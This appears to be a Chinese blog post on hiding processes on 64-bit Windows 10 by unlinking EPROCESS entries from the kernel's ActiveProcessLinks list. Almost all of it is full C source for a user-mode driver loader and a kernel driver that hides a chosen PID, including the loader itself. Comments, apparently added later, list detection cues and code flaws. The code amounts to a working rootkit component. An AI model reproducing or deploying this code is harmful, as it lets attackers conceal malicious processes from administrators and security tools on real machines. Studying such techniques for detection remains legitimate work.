Win10 EPROCESS 断链
介紹
參考了 https://github.com/landhb/HideProcess/
動態獲取 ActiveProcessLinksOffset,可兼容不同版本的 Win10 x64 系統。
運行結果
隱藏加載器自身
隱藏成功
驅動加載
#include <windows.h>
#include <winsvc.h>
#include <conio.h>
#include <stdio.h>
#include <winioctl.h>

#define DRIVER_NAME L"HideProcess"
#define DRIVER_PATH L"HideProcess.sys"
#define LINK_NAME "\\\\.\\HideProcessLnk"

#define IOCTRL_BASE 0x800
#define MYIOCTRL_CODE(i) \
CTL_CODE(FILE_DEVICE_UNKNOWN, IOCTRL_BASE+i, METHOD_BUFFERED,FILE_ANY_ACCESS)
#define CTL_HIDEPROCESS MYIOCTRL_CODE(0)

/*
 * Load the driver: register it with the Service Control Manager as a
 * kernel-mode service and start it.
 *
 * lpszDriverName  service name (also used as the display name)
 * lpszDriverPath  path of the .sys file; resolved to a full path first
 *
 * Returns TRUE when the service is running (or was already running),
 * FALSE on an SCM failure (the GetLastError() code is printed).
 *
 * Notes for defenders: this requires administrative rights, and on 64-bit
 * Windows 10 the driver must also satisfy driver signature enforcement
 * unless the machine is in test-signing mode. Registering a kernel service
 * is loud: the SCM writes a System event log record (event ID 7045,
 * "A service was installed in the system") with the service name and
 * image path, so the load is visible to log monitoring.
 */
BOOL LoadDriver(PCWSTR lpszDriverName, PCWSTR lpszDriverPath)
{
	// Resolve the driver file to a full path. The return value (0 on
	// failure) is not checked, so a bad path only surfaces when
	// StartService fails below.
	WCHAR szDriverFullPath[MAX_PATH] = { 0 };
	GetFullPathNameW(lpszDriverPath, MAX_PATH, szDriverFullPath, NULL);
	//printf("%s\n", szDriverFullPath);

	// Open the Service Control Manager
	SC_HANDLE hServiceMgr = NULL; // SCM handle
	hServiceMgr = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS);
	if (NULL == hServiceMgr)
	{
		printf("OpenSCManagerW failed, %d\n", GetLastError());
		return FALSE;
	}
	//printf("Opened the service control manager.\n");

	// Create the driver service (demand-start kernel driver)
	SC_HANDLE hServiceDDK = NULL; // NT driver service handle
	hServiceDDK = CreateServiceW(hServiceMgr,
		lpszDriverName,
		lpszDriverName,
		SERVICE_ALL_ACCESS,
		SERVICE_KERNEL_DRIVER,
		SERVICE_DEMAND_START,
		SERVICE_ERROR_IGNORE,
		szDriverFullPath,
		NULL,
		NULL,
		NULL,
		NULL,
		NULL);
	if (NULL == hServiceDDK)
	{
		DWORD dwErr = GetLastError();
		// ERROR_SERVICE_EXISTS is tolerated: the service is reopened below.
		if (dwErr != ERROR_IO_PENDING && dwErr != ERROR_SERVICE_EXISTS)
		{
			printf("CreateService failed, %d\n", dwErr);
			// NOTE(review): hServiceMgr is leaked on this path.
			return FALSE;
		}
	}
	//printf("Created the driver service.\n");

	// The service now exists (just created or pre-existing): reopen it and start it.
	// NOTE(review): a non-NULL handle from CreateServiceW is overwritten here
	// without being closed, the OpenServiceW result is not checked before
	// use, and the message below is printed for a StartService failure.
	hServiceDDK = OpenServiceW(hServiceMgr, lpszDriverName, SERVICE_ALL_ACCESS);
	if (!StartService(hServiceDDK, NULL, NULL))
	{
		DWORD dwErr = GetLastError();
		if (dwErr != ERROR_SERVICE_ALREADY_RUNNING)
		{
			printf("OpenService failed, %d\n", dwErr);
			// NOTE(review): both SCM handles are leaked on this path.
			return FALSE;
		}
	}
	//printf("Started the driver service.\n");

	if (hServiceDDK)
	{
		CloseServiceHandle(hServiceDDK);
	}
	if (hServiceMgr)
	{
		CloseServiceHandle(hServiceMgr);
	}
	return TRUE;
}

/*
 * Unload the driver: stop the service (which runs the driver's unload
 * routine), delete the service entry, and close the SCM handles.
 *
 * lpszDriverName  the service name passed to LoadDriver
 *
 * NOTE(review): neither OpenSCManagerW nor OpenServiceW is checked for
 * NULL before ControlService/DeleteService use the handles.
 */
void UnloadDriver(PCWSTR lpszDriverName)
{
	SC_HANDLE hServiceMgr = OpenSCManagerW(0, 0, SC_MANAGER_ALL_ACCESS);
	SC_HANDLE hServiceDDK = OpenServiceW(hServiceMgr, lpszDriverName, SERVICE_ALL_ACCESS);
	SERVICE_STATUS SvrStatus;
	ControlService(hServiceDDK, SERVICE_CONTROL_STOP, &SvrStatus);
	DeleteService(hServiceDDK);
	if (hServiceDDK)
	{
		CloseServiceHandle(hServiceDDK);
	}
	if (hServiceMgr)
	{
		CloseServiceHandle(hServiceMgr);
	}
}

/*
 * Send one PID to the driver over the control device.
 *
 * pid  process ID, passed as a 4-byte METHOD_BUFFERED input buffer
 *      (the driver rejects any other input length)
 *
 * Prints an error and returns if the device link cannot be opened.
 *
 * NOTE(review): the DeviceIoControl result is ignored and "ok" is printed
 * unconditionally, so a request the driver rejected still reports success.
 * lpBytesReturned is NULL while lpOverlapped is also NULL, which the
 * DeviceIoControl contract does not allow for synchronous calls.
 */
void HideProcess(INT32 pid)
{
	HANDLE hDevice = CreateFileA(LINK_NAME,
		GENERIC_WRITE | GENERIC_READ,
		0,
		NULL,
		OPEN_EXISTING,
		0,
		NULL);
	if (hDevice == INVALID_HANDLE_VALUE)
	{
		printf("Create Device Failed %d ! \n", GetLastError());
		return;
	}
	DeviceIoControl(hDevice, CTL_HIDEPROCESS, &pid, 4, NULL, 0, NULL, NULL);
	printf("Hide %d ok, check tasklist\n", pid);
	CloseHandle(hDevice);
}

/*
 * Entry point: show this process's PID in the console title, load the
 * driver, read PIDs from stdin until 0 is entered, then unload the driver.
 */
int main(int argc, char *argv[])
{
	// Set the console title by running `title ...` through the shell.
	// NOTE(review): pidbuf is 20 bytes and "title PID: " is 11 characters,
	// so a PID of 9 or more decimal digits (or a DWORD that %d prints as
	// negative) overflows the buffer. SetConsoleTitleA would avoid both
	// sprintf and system().
	DWORD pid = GetCurrentProcessId();
	char pidbuf[20] = { 0 };
	sprintf(pidbuf, "title PID: %d", pid);
	system(pidbuf);

	// Load the driver
	BOOL bRet = LoadDriver(DRIVER_NAME, DRIVER_PATH);
	if (!bRet)
	{
		printf("LoadNTDriver error\n");
		return 0;
	}

	while (1)
	{
		printf("Enter pid you want to hide(0 to exit): ");
		// NOTE(review): the scanf result is not checked; on non-numeric
		// input pid stays uninitialized and the offending token is never
		// consumed, so the loop spins.
		DWORD pid;
		scanf("%d", &pid);
		if (0 == pid) break;
		HideProcess(pid);
	}

	// Unload the driver
	UnloadDriver(DRIVER_NAME);
	system("pause");
	return 0;
}
驅動
#include <ntifs.h>

#define DEVICE_NAME L"\\device\\HideProcess"
#define LINK_NAME L"\\dosdevices\\HideProcessLnk"

#define IOCTRL_BASE 0x800
#define MYIOCTRL_CODE(i) CTL_CODE(FILE_DEVICE_UNKNOWN, IOCTRL_BASE+i, METHOD_BUFFERED,FILE_ANY_ACCESS)
#define CTL_HIDEPROCESS MYIOCTRL_CODE(0)

/*
 * Kernel side of the process-hiding demo (direct kernel object
 * manipulation): on request, the EPROCESS of the given PID is unlinked
 * from the kernel's ActiveProcessLinks list. The two field offsets are
 * discovered at run time instead of being hard-coded per build.
 *
 * What this does and does not change (relevant for detection): only the
 * doubly linked list that list-walking enumerators such as tasklist rely
 * on is modified. The EPROCESS object stays allocated, its threads keep
 * running, and it remains reachable by PID lookup
 * (PsLookupProcessByProcessId, used below, resolves PIDs through the CID
 * handle table rather than this list). Cross-view comparison — list walk
 * vs. PID/handle-table enumeration vs. pool scanning for EPROCESS
 * objects — therefore exposes the unlinked entry.
 */
void HideProcess(UINT32 pid);
UINT32 GetUniqueProcessIdOffset();
UINT32 GetActiveProcessLinksOffset();
void MyRemoveListEntry(PLIST_ENTRY curNode);

// Generic dispatch routine: completes every IRP other than device control
// with STATUS_SUCCESS and no data. This is what lets the user-mode
// CreateFileA/CloseHandle on the device link succeed.
NTSTATUS DispatchCommon(PDEVICE_OBJECT pObject, PIRP pIrp)
{
	UNREFERENCED_PARAMETER(pObject);
	pIrp->IoStatus.Status = STATUS_SUCCESS; // status returned to the caller
	pIrp->IoStatus.Information = 0;         // bytes transferred
	IoCompleteRequest(pIrp, IO_NO_INCREMENT);
	return STATUS_SUCCESS;                  // status returned to the I/O manager
}

/*
 * IRP_MJ_DEVICE_CONTROL dispatch.
 *
 * CTL_HIDEPROCESS: the input buffer must be exactly 4 bytes (a UINT32
 * PID); any other length is logged and ignored. No output is produced
 * (nOutput stays 0), and the IRP is completed with STATUS_SUCCESS in every
 * case, so the user-mode caller cannot distinguish a rejected request from
 * a successful one.
 *
 * The device is created without an explicit security descriptor (see
 * DriverEntry) and the control code uses FILE_ANY_ACCESS, so any caller
 * the default device DACL lets open the symbolic link reaches this path.
 */
NTSTATUS DispatchIoctrl(PDEVICE_OBJECT pObject, PIRP pIrp)
{
	UNREFERENCED_PARAMETER(pObject);
	ULONG nIoctrlCode = 0;
	PVOID pInputBuff = NULL;
	PVOID pOutputBuff = NULL;
	ULONG nInputBufferLength = 0;
	ULONG nOutputBufferLength = 0;
	ULONG nOutput = 0;
	PIO_STACK_LOCATION pStack = NULL;

	// METHOD_BUFFERED: input and output share the system buffer
	pInputBuff = pOutputBuff = pIrp->AssociatedIrp.SystemBuffer;
	pStack = IoGetCurrentIrpStackLocation(pIrp);
	nInputBufferLength = pStack->Parameters.DeviceIoControl.InputBufferLength;
	nOutputBufferLength = pStack->Parameters.DeviceIoControl.OutputBufferLength;
	nIoctrlCode = pStack->Parameters.DeviceIoControl.IoControlCode;

	switch (nIoctrlCode)
	{
	case CTL_HIDEPROCESS:
	{
		// Length check guards the 4-byte read below
		if (nInputBufferLength != 4)
		{
			DbgPrint("Invalid PID\n");
			break;
		}
		UINT32 pid = *(PUINT32)pInputBuff;
		DbgPrint("Hide %d PID\n", pid);
		HideProcess(pid);
		break;
	}
	default:
		DbgPrint("Unknown iocontrol\n");
	}

	pIrp->IoStatus.Status = STATUS_SUCCESS;
	pIrp->IoStatus.Information = nOutput;
	IoCompleteRequest(pIrp, IO_NO_INCREMENT);
	return STATUS_SUCCESS;
}

// Driver unload: remove the symbolic link and the device object.
// NOTE(review): pDriverObject is marked UNREFERENCED_PARAMETER but is used
// a few lines later; the macro is misleading here.
VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
{
	UNREFERENCED_PARAMETER(pDriverObject);
	UNICODE_STRING uLinkName = { 0 };
	RtlInitUnicodeString(&uLinkName, LINK_NAME);
	IoDeleteSymbolicLink(&uLinkName);
	IoDeleteDevice(pDriverObject->DeviceObject);
	DbgPrint("Driver unloaded\n");
}

/*
 * Driver entry: create the control device and its DOS-visible symbolic
 * link, route all IRPs to DispatchCommon except device control (which goes
 * to DispatchIoctrl), and register DriverUnload.
 *
 * Returns the IoCreateDevice / IoCreateSymbolicLink failure status, else
 * STATUS_SUCCESS.
 *
 * NOTE(review): IoCreateDevice is called with no device extension and no
 * security descriptor, so who may open the device is whatever the system's
 * default device DACL grants — confirm before assuming only administrators
 * can reach the IOCTL.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath)
{
	UNREFERENCED_PARAMETER(pRegPath);
	UNICODE_STRING uDeviceName = { 0 };
	UNICODE_STRING uLinkName = { 0 };
	NTSTATUS ntStatus = 0;
	PDEVICE_OBJECT pDeviceObject = NULL;
	ULONG i = 0;

	RtlInitUnicodeString(&uDeviceName, DEVICE_NAME);
	RtlInitUnicodeString(&uLinkName, LINK_NAME);

	ntStatus = IoCreateDevice(pDriverObject, 0, &uDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &pDeviceObject);
	if (!NT_SUCCESS(ntStatus))
	{
		DbgPrint("IoCreateDevice failed:%x", ntStatus);
		return ntStatus;
	}
	// Buffered I/O, matching METHOD_BUFFERED and the SystemBuffer use in DispatchIoctrl
	pDeviceObject->Flags |= DO_BUFFERED_IO;

	ntStatus = IoCreateSymbolicLink(&uLinkName, &uDeviceName);
	if (!NT_SUCCESS(ntStatus))
	{
		IoDeleteDevice(pDeviceObject);
		DbgPrint("IoCreateSymbolicLink failed:%x\n", ntStatus);
		return ntStatus;
	}

	// Every major function gets the generic handler. The loop stops before
	// index IRP_MJ_MAXIMUM_FUNCTION, so that last table slot keeps the I/O
	// manager's default.
	for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
	{
		pDriverObject->MajorFunction[i] = DispatchCommon;
	}
	pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DispatchIoctrl;
	pDriverObject->DriverUnload = DriverUnload;
	DbgPrint("Driver load ok!\n");
	return STATUS_SUCCESS;
}

/*
 * Unlink the EPROCESS with the given PID from ActiveProcessLinks.
 *
 * The walk starts at PsGetCurrentProcess() — presumably the IOCTL caller,
 * since this runs from the device-control dispatch — and follows Flink
 * until the PID matches or the walk returns to its starting point.
 * UniqueProcessId is a HANDLE-sized field; only its low 32 bits are read
 * and compared here.
 *
 * Both offsets come from the run-time scan in GetUniqueProcessIdOffset and
 * are used unchecked: a failed scan (offset 0) turns every read below into
 * a read at the start of the EPROCESS and the unlink into a write at the
 * wrong place — a bugcheck risk rather than a silent failure.
 *
 * No synchronization is taken while reading and modifying the list, so
 * this races with concurrent process creation and exit on other CPUs.
 */
void HideProcess(UINT32 pid)
{
	PEPROCESS CurrentProcess, MyProcess;
	MyProcess = CurrentProcess = PsGetCurrentProcess();
	UINT32 CurrentPid;
	UINT32 PidOffset = GetUniqueProcessIdOffset();
	UINT32 ActiveProcessLinksOffset = GetActiveProcessLinksOffset();

	// Walk the EPROCESS list
	do
	{
		CurrentPid = *(PUINT32)((PCHAR)CurrentProcess + PidOffset);
		if (pid == CurrentPid)
		{
			PLIST_ENTRY curNode = (PLIST_ENTRY)((PUCHAR)CurrentProcess + ActiveProcessLinksOffset);
			MyRemoveListEntry(curNode);
			break;
		}
		// Flink is the first pointer of the LIST_ENTRY; subtracting the
		// field offset yields the containing EPROCESS
		CurrentProcess = (PEPROCESS)(*(PUINT64)((PUCHAR)CurrentProcess + ActiveProcessLinksOffset) - ActiveProcessLinksOffset);
	} while (MyProcess != CurrentProcess);
}

/*
 * Find the byte offset of EPROCESS.UniqueProcessId without a hard-coded
 * layout: take two processes with known PIDs (System, PID 4, and the
 * current process) and scan the first 0x300 bytes of both objects for the
 * pointer-sized slot that holds the respective PID in each.
 *
 * Returns the offset, or 0 if either lookup fails or no common offset is
 * found within the scanned range.
 *
 * NOTE(review): the scan reads a HANDLE at every byte offset, i.e. mostly
 * unaligned loads (tolerated on x64, still undefined behaviour in C), and
 * if the second PsLookupProcessByProcessId fails the reference taken on
 * eprocess[0] is never released.
 */
UINT32 GetUniqueProcessIdOffset()
{
	UINT32 offset = 0;
	HANDLE pid[2];
	PEPROCESS eprocess[2];
	pid[0] = (HANDLE)4;               // System process
	pid[1] = PsGetCurrentProcessId(); // the current (calling) process
	if (!NT_SUCCESS(PsLookupProcessByProcessId(pid[0], &eprocess[0])))
	{
		return 0;
	}
	if (!NT_SUCCESS(PsLookupProcessByProcessId(pid[1], &eprocess[1])))
	{
		return 0;
	}
	for (UINT32 i = 0; i < 0x300; i++)
	{
		if (*(PHANDLE)((PUCHAR)eprocess[0] + i) == pid[0] && \
			* (PHANDLE)((PUCHAR)eprocess[1] + i) == pid[1])
		{
			offset = i;
			break;
		}
	}
	// PsLookupProcessByProcessId takes a reference on each object; drop both
	ObDereferenceObject(eprocess[0]);
	ObDereferenceObject(eprocess[1]);
	return offset;
}

// Offset of EPROCESS.ActiveProcessLinks, derived from the assumption that
// the LIST_ENTRY immediately follows the pointer-sized UniqueProcessId
// field. Returns 0 when the PID offset itself could not be found.
UINT32 GetActiveProcessLinksOffset()
{
	UINT32 PidOffset = GetUniqueProcessIdOffset();
	if (PidOffset == 0) return 0;
	return PidOffset + sizeof(void *);
}

/*
 * Unlink curNode from its doubly linked list and make it self-referential.
 * The two neighbours are joined to each other; the removed node's Flink and
 * Blink then both point at the node itself, so that a later unlink of the
 * same node (e.g. when the process exits) touches only the node — the
 * original comment notes a blue screen otherwise.
 */
void MyRemoveListEntry(PLIST_ENTRY curNode)
{
	PLIST_ENTRY preNode, nextNode;
	// Neighbouring nodes
	nextNode = curNode->Flink;
	preNode = curNode->Blink;
	// Previous node's Flink skips over us
	preNode->Flink = curNode->Flink;
	// Next node's Blink skips over us
	nextNode->Blink = curNode->Blink;
	// Point both of our links at ourselves; otherwise a blue screen
	curNode->Flink = curNode->Blink = curNode;
}
總結